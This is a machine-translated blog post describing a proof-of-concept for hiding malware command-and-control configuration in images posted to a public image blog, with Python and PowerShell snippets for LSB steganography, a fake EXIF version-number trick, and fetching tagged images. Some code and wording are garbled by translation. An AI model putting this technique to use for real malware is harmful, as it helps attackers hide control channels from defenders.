Misuse image blogs for C & amp; C Configuration

Misuse image blogs for C & C Configuration

0x00 background

A few months ago, I saw an article about Hammertoss malware in Russia, using Twitter as the C & C service. The abuse of TechNet in a similar way has also been reported [1 ]. After a brain hole, I think that using images (or other formats) as the carrier of steganography to carry C & C control commands is more concealed, in addition, the information carried is much larger than twitter's 140-character limit.

Some blogs can save the original images uploaded by users and add tags (hash tags) to images ). An image with a hash tag can be obtained through a fixed url. In this way, you can not only embed hidden information, but also quickly locate problematic images. When the control party needs to modify the configuration (for example, when the IP address changes), it only needs to log on to the social network and upload a new control command to complete the update. Flexible and concealed.

In this example, the simplest implicit write method is used-the lowest valid bit to embed C & C information. Interested readers can also implement other watermarking algorithms themselves. Image blog selects a popular service in China for demonstration only.

0x01 hiding Principle

The idea of embedding hidden information in LSB is very simple. Select a 24-Bit Bitmap without Alpha channel as the carrier. each pixel in the image has three RGB color components. The value ranges from 0 to 00 ~ 0xFF, a total of 8 binary bits. Such a pixel can represent 16777216 colors.

For each color channel, the minimum binary bit is modified, while the remaining seven digits remain unchanged, so small differences are hard to be distinguished by the naked eye. As shown in, there is almost no difference between the two color blocks.

In this way, the space carrying information is opened up in pixels. By embedding information into the lowest valid bit, each pixel can carry 3 bit information, that is, 23 = 8 states.

0x02 Image Mixing

To support the embedding of any binary data, you also need to pre-encode the original data and map one byte to multiple pixels. There is exactly one encoding method-base64, which is characterized by binary data being encoded into 64 printable metacharacters, ending with = for length alignment. 64 is exactly 26, which is exactly the amount of information that two pixels can hold with the lowest valid bit.

Since the C & C command is not sure about the length, additional fields are required to specify this length. It can imitate the BSTR method in IE and indicate the length of the entire array in the starting element of the struct. It can also store the image metadata, such as EXIF.

It is too easy to discover data directly in EXIF. I have designed an algorithm to encode a small positive integer into a string that looks very similar to a software version. Then, place the "version number" in the Software field of EXIF, and it seems that there is no sense of violation.

The encoding is very simple. First, open n square and then round down to e. Convert n to the number of e-hexadecimal values, and each bit will get an array a. Add e to the first element of array; join with the decimal point to get the string s; reverse s to get the "version number ". For example, if n = 1992 and the square is rounded up, e = 44,1992 is converted to the 44 hexadecimal format to get 1992 = 12*442 + 1*441 + 1*440, that is, the array [44, 12, 1, 1]. Finally, merge and reverse the characters to get 1.1.21.44, and add the software name of Hu Yun. It looks like a version number ......

#!pythondef fakever(n):  def nums(num):    base = int(num ** 0.5)    yield base    while num:      yield num % base      num //= base  ver = map(str, nums(n)) if n >= 4 else (str(n), '1')  return '.'.join(ver)[::-1]

Use the PIL library to embed configurations into images. The basic process is as follows:

Read the C & C configuration, encode it into 64 metacharacters, corresponding to 0x00-0x40 read the image, convert its color pattern to RGB every two pixels into a group, embed a metacharacter to encode the length of the embedded data into the so-called "version number" and write the EXIF data

Although PIL image objects provide putpixel and getpixel methods to operate on a single pixel, these two methods are inefficient when processing a large number of pixels in batches. The better way is to convert the Image into a pixel array using the tobytes method of the PIL. Image object, and directly modify the value of the array.

For the complete code, see github.com/ChiChou/lowershell/steg.py.

Note that the output file format must be lossless png or bmp. We recommend that you use png. JPEG image formats may cause loss of pixel information and fail to extract complete data.

Register a vest, upload the merged image to the social network, and specify a tag.

0x04 extracting hidden information

As the "malware" side, to obtain the C & C configuration, you only need to request a page of a social networking website, parse the HTML content to obtain the source image url, and finally download and decode the hidden information. This article demonstrates how to write a program using PowerShell. With. NET's HTML parsing and image processing functions, you can easily restore hidden information.

The PowerShell Invoke-WebRequest cmdlet can initiate an http request to return the document Object of the page. The document object can be used to traverse and read the elements under the DOM tree on the page. For example, the Images attribute can obtain all the image elements on the page.

Take an Image blog in China as an example. To obtain the source image url of an image labeled "world", you only need one line:

#!powershell(Invoke-WebRequest 'http://www.lofter.com/tag/world'l).Images | where {$_.'data-origin'} | % {$_.'data-origin' -replace "\?imageView.*$"}

One of the major advantages of PowerShell is that it can directly call the. NET Framework .. NET's System. Drawing Assembly provides Bitmap Processing capabilities to read pixel data and parse EXIF data.

The implementation of information extraction is the opposite of the Code process of image embedding:

Read the EXIF and calculate the length of the payload (C & C configuration file). Each two pixels is the minimum valid bit for a group of extracted elements, which form a metacharacter to map the metacharacter to a base64 encoded string, decoded to obtain the original hidden data

Similar to PIL, the best way to modify pixels in. NET is to directly modify the array. Use the LockBits of the Image object to lock the entire bitmap area to read-only, and then use Marshal to copy the pixel data into a binary array. directly operating the array instead of the pixel can increase the speed.

#! Powershell $ rect = [System. drawing. rectangle]: FromLTRB (0, 0, $ img. width, $ img. height) $ mode = [System. drawing. imaging. imageLockMode]: ReadOnly $ format = [System. drawing. imaging. pixelFormat]: Format32bppArgb $ data = $ img. lockBits ($ rect, $ mode, $ img. pixelFormat) $ size = [Math]: Abs ($ data. stride) * $ img. height $ pixels = New-Object Byte [] $ size [System. runtime. interopServices. marshal]: Copy ($ data. scan0, $ pixels, 0, $ size) # copy to the buffer zone

Complete code reference

Github.com/ChiChou/lowershell/server/Lib/Steg.ps1

The example project also implements an icmp bounce shell with encryption, which is not covered in this article and is omitted here.

0x05 Running Effect

First, prepare a suitable image, which cannot accommodate data and is inconvenient for network transmission.

Run python steg. py example. config. json IMG_7495.jpg blend.png

The synthesized image is as follows:

Rough looks no different. Upload with the # ThisIsAnUniqueSecretTag as the tag, and then execute the PowerShell script on another machine to completely read the configuration file example. config. json.

0x06 conclusion

As a means of concealed communication, implicit writing has been used in malware for a long time. This article proposes and implements a method to issue C & C control commands by misuse of image social media websites, which is only used for conceptual demonstration and discussion.

0x07 references FireEye, Microsoft wipe TechNet clean of malware hidden by hackersWikipedia implicit write